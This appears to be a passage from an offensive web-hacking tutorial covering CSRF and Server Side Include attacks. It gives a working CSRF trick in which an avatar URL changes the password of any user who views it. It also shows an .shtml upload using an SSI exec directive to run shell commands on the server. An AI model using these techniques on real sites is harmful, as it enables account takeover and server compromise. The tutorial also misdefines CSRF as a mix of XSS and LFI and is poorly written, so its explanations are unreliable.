Shortcut from Cross Site Request Forgery. CSRF is mix of XSS and LFI. It is used to execute something without knowing username.
2) Vulnerable places
Can be used when you are using GET method. If CSRF is dont successfully, attacker can change password of some user. Most common vulnerable places are avatars.
3) Exploiting vulnerability
Lets say we have profile link:
Code:
http://www.link.com/profile.phpWhere you can see user data (username, avatar, email...).
Now when user want to edit his profile using e.g.
Code:
http://www.link.com/edit_profile.phpNow instead of avatar link we gonna add link from profile editing together with new code using GET method.
NOTE: We have to use GET method during profile editing otherwise we wont be able to attack.
Add avatar link:
Code:
http://www.link.com/edit_profile.php?password=newpasswordpassword is name of input (It can be different, it's best to chekc source code)
Now when we look at avatar we wont be able to see picture (like there is no picture). When other user watch your avatar, if attack was successful, his password is gonna be changed in one we put.
[XVI] Server Side Includes | Server Side Inclusion
1) Introduction Server Side Includes
Server Side includes enables us to do some things faster on sites. Over SSIncludes we ca update DB, send mails and many other functions. SSI is working like when some run script on that site. Default extension for SSI files is .shtml
To get SSI working in that directory where is .shtml is located must be .htaccess file, which holds some configuration included inside file.
SSIs is by default disabled you can enable it by creating new .htaccess file with this config:
Code:
AddType text/html .shtml
AddHandler server-parsed .shtml
AddHandler server-parsed .html
Options Indexes FollowSymLinks Includes2) SSI creating
We are starting script with <!--#
Some simple script look like this:
<command> <variable>=<variable content>-->
<command> -
Code:
config
include
flow
set
printenv
echo
exec
fsize
flastmod
time & dateWith --> we end script.
script e.g.
Code:
<!--#include file="yourfilename.txt" -->
<!--#echo var='This will write this stupid text.'-->3) Server Side Inclusion
Server Side Inclusion Attack is very useful attacking method. For this it's recommended to have primary knowledge of Bash and Batch programming.
Site is vulnerable on SSI when extensions �.shtml� �.shtm� or �.stm�, are included in Apache config file.
e.g. we can create file with next command:
Code:
<!--#exec cmd='ls -la'-->Save this as .shtml file and open it on site.
I think you already know what is going to happ.
THE BEST WEBSITE HACKING TUTORIAL
Post a Comment